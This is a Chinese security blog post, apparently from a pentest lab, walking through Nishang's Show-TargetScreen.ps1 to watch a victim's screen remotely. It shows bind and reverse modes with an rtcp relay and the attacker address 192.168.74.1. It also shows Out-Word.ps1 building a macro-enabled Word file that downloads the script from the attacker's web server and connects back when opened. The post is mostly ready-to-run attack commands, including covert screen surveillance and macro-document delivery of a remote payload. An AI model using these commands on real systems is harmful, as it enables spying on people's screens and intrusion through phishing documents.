专栏首页黑白安全使用Powershell对目标进行屏幕监控

使用Powershell对目标进行屏幕监控

Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。包括了下载和执行、键盘记录、dns、延时命令等脚本。今天要给大家介绍的是如何通过powershell对目标的屏幕进行实时监控。

脚本下载地址如下:

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Show-TargetScreen.ps1

使用也很简单,脚本包括了reverse以及bind模式。下面是使用示例:

0x01 Bind模式:

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333

然后在自己的计算机上使用火狐访问目标3333端口,结果如下图:

0x02Reverse模式

attacker:

在这里可以使用创宇的py脚本转发:

https://github.com/knownsec/rtcp

执行:

rtcp [master] python rtcp.py l:5555 l:4444

监听本地5555端口以及4444端口。之后在target执行:

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Reverse-IPAddress 192.168.74.1 -Port 5555

效果截图:

0x03使用Powershell Client

以Out-Word.ps1作为演示示例:

生成word文件:

PSC:\Users\evi1cg\Desktop> . .\Out-Word.ps1
PS C:\Users\evi1cg\Desktop> Out-Word -PayloadURL"http://192.168.74.1/Show-TargetScreen.ps1"-Arguments"Show-TargetScreen -Reverse -IPAddress 192.168.74.1 -Port 6666"

之后将Show-TargetScreen.ps1放在我们的web根目录,测试:

开启监听:

rtcp[master]pythonrtcp.pyl:6666l:4444

当运行开启office宏的word时,我们就可对其屏幕进行监控,如下图:

文由Ms08067安全实验室

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 从“万豪泄露事件”看数据安全整个大环境

    11月30日,万豪国际集团发布声明称,公司旗下喜达屋酒店的一个客房预订数据库被黑客入侵,在2018年9月10日或之前曾在该酒店预定的最多约5亿名客人的信息或被泄...

    周俊辉
  • 超 15 亿敏感文件被曝光 快检查你的信息安全

    据 digital shadows 报道,在三个月的时间内有超过 15 亿个敏感文件被公开在网上,其中包括专利申请、工资单、纳税申报单、患者名单、版权申请和源代...

    周俊辉
  • 最新研究发现智能空调可能会拖垮电网

    据外媒报道,你可能不会经常想起家里的空调,或许只有当你在炎热夏天到来的时候才会想到它。然而黑客们却可能时刻惦记着它,因为他们利用它来摧毁电网。据了解,来自普林斯...

    周俊辉
  • 视频智能云组网EasyNTS中sqlite和mysql数据库如何进行相互切换?

    为了在现有网络基础设施的基础上对网络功能进行优化,结合云计算的特点,基于云计算的智能云网络架构应运而生。云网络的出现远远超越了传统网络的设计理念和服务范畴,并提...

    EasyNVR
  • TiDB 1.1 Beta Release

    2018 年 2 月 24 日,TiDB 发布 1.1 Beta 版。该版本在 1.1 Alpha 版的基础上,对 MySQL 兼容性、系统稳定性做了很多改进。

    PingCAP
  • VC连接MySql

      MYSQL * stdcall mysql init (MYSQL *mysql): 初始化一个数据库.如果传NULL.则返回一个数据库对象

    IBinary
  • 100道+ JavaScript 面试题,助你查漏补缺

    详细资料可以参考: 《JavaScript 有几种类型的值?》 《JavaScript 有几种类型的值?能否画一下它们的内存图;》

    前端达人
  • 最近写的《后台管理系统的前端代码生成工具》介绍

    《后台管理系统的前端代码生成工具》做的是生成项目 admin-template 的列表,新增,编辑,详情页的代码,如上图所示。通过点击“生成下载内容”,点相应的...

    Joel
  • 紧扣时代发展脉搏,沃趣科技惊艳亮相2018数博会

    当今世界,以大数据、云计算等为代表的新一轮科技革命席卷全球,与信息技术、与经济社会以前所未有的广度和深度交汇融合,人类社会正在被网络化连接、数据化描绘、融合化发...

    沃趣科技
  • 类似于币安的比特币币币交易系统平台开发

    比特币作为2018年最出色的投资产品,它吸引了众多的客户群体,交易比特币越来越成为一种潮流。而比特币也担得起这个名号,因为目前为止还没有哪个能够与之相媲美,比特...

    v13823115027

扫码关注云+社区

领取腾讯云代金券